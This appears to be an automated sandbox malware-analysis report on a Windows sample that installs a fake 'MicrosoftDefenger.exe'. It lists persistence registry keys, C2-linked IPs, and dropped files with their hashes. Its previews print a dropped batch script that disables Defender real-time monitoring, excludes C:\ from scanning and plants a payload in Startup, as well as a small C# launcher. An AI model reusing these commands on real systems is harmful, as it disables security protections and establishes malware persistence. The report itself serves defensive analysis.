                                                                                                                                                                  • VT rate limit hit for: IYXE4Uz61k.exe

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  17:01:58API Interceptor41x Sleep call for process: powershell.exe modified
                                                                                                                                                                  22:02:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger "C:\windows\inf\MicrosoftDefenger.exe"
                                                                                                                                                                  22:02:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger "C:\windows\inf\MicrosoftDefenger.exe"
                                                                                                                                                                  22:02:51AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run MicrosoftDefenger "C:\windows\inf\MicrosoftDefenger.exe"
                                                                                                                                                                  22:03:08AutostartRun: WinLogon Shell "C:\windows\inf\MicrosoftDefenger.exe"

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  185.17.0.139fkABXcncEA.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                  • 185.17.0.139:8080/client/setClientStatus?clientId=960781

                                                                                                                                                                  Domains

                                                                                                                                                                  No context

                                                                                                                                                                  ASNs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  ON-LINE-DATAServerlocation-NetherlandsDrontenNLContent Collaboration Terms.dll.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  • 185.209.21.227
                                                                                                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 185.231.71.206
                                                                                                                                                                  x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 212.86.109.115
                                                                                                                                                                  OBS-Studio-30.2.3-Windows-Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 95.215.204.231
                                                                                                                                                                  5yTEUojIn0.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                  • 77.83.175.91
                                                                                                                                                                  DihoyYp8ie.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 45.88.76.207
                                                                                                                                                                  Vl9Yz1UB1a.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 77.83.175.91
                                                                                                                                                                  PtGMWtcZF0.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                  • 77.83.175.91
                                                                                                                                                                  yjNy22UmmY.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                  • 77.83.175.91
                                                                                                                                                                  g8Z5OO8o6p.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                  • 77.83.175.91
                                                                                                                                                                  SUPERSERVERSDATACENTERRUqe4efGS22G.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 185.189.14.174
                                                                                                                                                                  qe4efGS22G.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  • 185.189.14.174
                                                                                                                                                                  hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212
                                                                                                                                                                  hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212
                                                                                                                                                                  hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212
                                                                                                                                                                  hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212
                                                                                                                                                                  hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212
                                                                                                                                                                  hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212
                                                                                                                                                                  hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212
                                                                                                                                                                  hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                  • 185.212.148.212

                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                  No context

                                                                                                                                                                  Dropped Files

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exeMicrosoftPrt.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    MicrosoftPrt.exe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      MicrosoftPrt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        fkABXcncEA.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                          BZMxi2zof1.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                                                                                            migrate.zipGet hashmaliciousXmrigBrowse
                                                                                                                                                                              C:\Users\user\Desktop\Aepdvrho.logfile.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                  A5EbyKyjhV.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                    qNdO4D18CF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                      iN1fhAtzW2.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                        based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                                                          RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                            main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                              file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                lsass.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34208376
                                                                                                                                                                                                  Entropy (8bit):7.9976397266318
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:786432:Oo0DUdQuhK/+CGLuoDarzoMQQC5RxAOd99JW88D/N3R:Oo0DU0e3arzSQCnx9JWxb
                                                                                                                                                                                                  MD5:02484A615E581A9A431E20DF300FAED4
                                                                                                                                                                                                  SHA1:D855E2C9338B1508577B3E831CC89838C2768647
                                                                                                                                                                                                  SHA-256:16D2F6194D1B1989FBEF4572055DBF62A0D6A2570B316AC15722192F1C559A50
                                                                                                                                                                                                  SHA-512:7B69E3E47863EC7EDFA03FA1F25A15C90EE84AEC520FF08D8834B010EB58532F444DAA81056B3DCC7D77F42EB0F390B8490CB59A705FA24B6674A088D796FE57
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: MicrosoftPrt.exe.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: MicrosoftPrt.exe.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: MicrosoftPrt.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: fkABXcncEA.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: BZMxi2zof1.exe, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: migrate.zip, Detection: malicious, Browse
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-@.`~@.`~@.`~..c.G.`~..e...`~..d.J.`~...~D.`~..e.h.`~..d.Q.`~..c.I.`~..a.K.`~@.a~..`~.d.T.`~.b.A.`~Rich@.`~........................PE..d....)Xe.........."....!.....l................@.............................@......).....`.....................................................x.... ........... ...........0..X... ...................................@............................................text...P........................... ..`.rdata...*.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc........ ......................@..@.reloc..X....0......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\migrate.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\IYXE4Uz61k.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):50263358
                                                                                                                                                                                                  Entropy (8bit):7.999764974460631
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:786432:22h3MOTX5dPxVIrPYwzQYxwFICPGgtwLqmodhZ//ivKyG6MEHouC72oMChqm6Dab:rh3Xj5gPYwEdmCu+3/w46tHoJLMChqm5
                                                                                                                                                                                                  MD5:20737946FC89B9DB44F82EAE5AD41ACB
                                                                                                                                                                                                  SHA1:527C9AECC9608D9E5C81D43445B6D7F68F809B4C
                                                                                                                                                                                                  SHA-256:0FC38784C09958F10C6D496280615E3CE7E1439A70E28760EAEF7DB316F5B3A6
                                                                                                                                                                                                  SHA-512:A207C628BD63119E573C2931129F50CA38A98543A8C0FF43D41FED390D948025A348A28F3544A9106F148AE9147E846D248B765AB180BA382CD5859192846B45
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\ru.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\IYXE4Uz61k.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32
                                                                                                                                                                                                  Entropy (8bit):3.6883072359050906
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Ljn9GRVJRBJ8K:fkzjj
                                                                                                                                                                                                  MD5:11E08B5ABF3F1675F99C96F78C128B23
                                                                                                                                                                                                  SHA1:40D6DD08262EF959328AEC4DC5ED07532232037C
                                                                                                                                                                                                  SHA-256:50AC09332FF9D6521244B4F9CF6FD9CC489B3324ED1316E07F6A5904230397E7
                                                                                                                                                                                                  SHA-512:3005767016B4C5DA031FB2AC5288B01821D54768B5E099E1157D4FA4621A078D589E54D9C5C89DED58AC3CA94395DACBF1D840F9210F909D3C9DFE8092DE8FF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:start "" "c:\programdata\st.bat"

                                                                                                                                                                                                  C:\ProgramData\st.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\IYXE4Uz61k.exe
                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                  Entropy (8bit):5.424428309831207
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:5VMjhKYtPzOjuWVlNVwUVlaUVljUVlbUVlLUVlm4UVlB0k7P:54hLPzwblxlflSl6lqlmll7L
                                                                                                                                                                                                  MD5:4050181042859E45ECFA6F224AFA79DF
                                                                                                                                                                                                  SHA1:E72C9C8BA589B42A82792D8F7E794B79D8E831E3
                                                                                                                                                                                                  SHA-256:9DF0FF284989B10162CFFB51D9873C6743FFB83F6D7C4B869A8193E6D6AC63E9
                                                                                                                                                                                                  SHA-512:DE2740437A431403AC89577F1F570A78269F0F24C58B531E7522542E60A668D7DA355BE3A126AC2FC4472282C0B06D8B217EC62F04ED5E6AAB0BA9C8D27C54CE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:@echo off..chcp 65001......copy "c:\programdata\1.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"......tasklist /FI "IMAGENAME eq Superfetch.exe" 2>NUL | find /I /N "Superfetch.exe">NUL..if "%ERRORLEVEL%"=="0" exit..takeown /f c:\windows\tasks..TIMEOUT /T 3 /NOBREAK..powershell Set-MpPreference -DisableRealtimeMonitoring $True..powershell Set-MpPreference -ExclusionPath c:\..icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "%username%:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "%domain%%username%:(R,REA,RA,RD)"..icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"..TIMEOUT /T 3 /NOBREAK..c:\programdata\migrate.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bridgeprovider.exe.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1915
                                                                                                                                                                                                  Entropy (8bit):5.363869398054153
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                                                                                                                                                  MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                                                                                                                                                  SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                                                                                                                                                  SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                                                                                                                                                  SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                  Entropy (8bit):5.378656660173192
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:7WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyuZ:7LHyIFKL3IZ2KRH9OugbZ
                                                                                                                                                                                                  MD5:037238069E4B17EEEE04958C9C5647FE
                                                                                                                                                                                                  SHA1:C965B7C16C145D237BEA6CD96F7CC37EF5F00C35
                                                                                                                                                                                                  SHA-256:02D9546A015666611D4FA21C3932180DF34CD74B7B505DAFC7BD1D59B07577CA
                                                                                                                                                                                                  SHA-512:EC5B7365339B2FB87FC604C87439CBE62DAE6D9E5B837E33897B4116421A2195E1E05597CBF1B3D8732FDAB54F4C747CD1AD0A52ADBA35649738FAF5277F73EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.0.cs

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):383
                                                                                                                                                                                                  Entropy (8bit):4.886336955366934
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2DkMZX3iFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLIz
                                                                                                                                                                                                  MD5:655A11EE83DEC19A6FEEED937BD221A4
                                                                                                                                                                                                  SHA1:B575D0A0889613AC6C7D29999943ABBFDC76B867
                                                                                                                                                                                                  SHA-256:ED1169390C20891D3994578A4022F0C0AE2860B28A11E11BCC5A529C3832A222
                                                                                                                                                                                                  SHA-512:222A942FC06DD7ECB64CCE29172793A60DAD1AB0DD6E710FDD24755A535CEA095F3F292D2EFA31E39D52CD062BCA8F30432A62E5091609A1C34BDBA143E6FAE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\windows\inf\MicrosoftDefenger.exe"); } catch { } }).Start();. }.}.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):250
                                                                                                                                                                                                  Entropy (8bit):5.166726947195435
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fPOUBV7:Hu7L//TRq79cQWfVv7
                                                                                                                                                                                                  MD5:7A047189AD671699B450759CCD3FEAD0
                                                                                                                                                                                                  SHA1:EF20C05130498000A33A3DB7D423F3D8663A7382
                                                                                                                                                                                                  SHA-256:6BA2B55F3E64EA4980AFE66EB712B034706ACDB516B7F2B7F88C8852BE4C5216
                                                                                                                                                                                                  SHA-512:65ED11F66CC5FCB00DF59914D445C72A7ED395AD49198A2A0521BE7D67FC4884EC71AB03923CD88B4C32DABDEA1BF48335EE4558902B81642A5E753FCF3F08FD
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.0.cs"

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.out

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (317), with CRLF, CR line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):738
                                                                                                                                                                                                  Entropy (8bit):5.277348515707714
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xkRI/u7L//TRq79cQWfVv6KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:QI/un/Vq79tWfcKax5DqBVKVrdFAMBJj
                                                                                                                                                                                                  MD5:34C3FB31F755C142003FFF33F0ABC078
                                                                                                                                                                                                  SHA1:50F27551982678D28D98440610D7B94AF1F7F044
                                                                                                                                                                                                  SHA-256:0C6380F6F7DF247B5A63F7647E83785196A85BF389911B2E5C2C035060EE8B50
                                                                                                                                                                                                  SHA-512:D1F170D5C3158847E5ECD71277E0A6C03FF83CF5D46812291E8CDE20C71A6E4431F1E557596411198A1274C9D1F7600C9F3F37BF464DB77D21AA3C03B3141AEE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.C:\Windows> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\6IIZ5ZPD1C

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25
                                                                                                                                                                                                  Entropy (8bit):4.403856189774723
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:+X487NUj0:+v7NUw
                                                                                                                                                                                                  MD5:CE85D7789CE7FA9FB80A7C8F8265F057
                                                                                                                                                                                                  SHA1:1395B874C90EEE02BA771A879E5B625F6A5557B0
                                                                                                                                                                                                  SHA-256:C02AC067EB64FC2B68E874D73861708EB2E969DED90FF637D2F214F968660E43
                                                                                                                                                                                                  SHA-512:E662FCEFEC73CDDCE4F858EE242A5EE7A4EB578D812B177DAD13B2F85910616274531C49AD3A97A459DC3F6207374DE6C8547F1698452D2AC6297E1D0F761C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:6T9ktMGa5ewnmSyJ0qFyXIwcM

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\EekRrdxVrk.bat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):212
                                                                                                                                                                                                  Entropy (8bit):5.093694819180712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:hCijTg3Nou1SV+DE3kMZXIKOZG1wkn23fIeG:HTg9uYDE3PyfAeG
                                                                                                                                                                                                  MD5:9510D9E0DABE623B4921AA5CB1E05227
                                                                                                                                                                                                  SHA1:941994E034D68CD7A4CE4161BAC72682FD8A551E
                                                                                                                                                                                                  SHA-256:A89015ECC45BA69D841CA539D220C4428377B327A8D20CAB9B56F871BA471789
                                                                                                                                                                                                  SHA-512:F559B567B1D9A1333E580819617D1348523755681641AEC4C83C008A3434044C9043D3909957A091002DB5E723E22C263AA94D38E036E652C4148AAF41A8BB9E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\windows\inf\MicrosoftDefenger.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\EekRrdxVrk.bat"

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1idvlixw.a5b.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d0snfud.mu3.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jbsrf1u.4ip.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

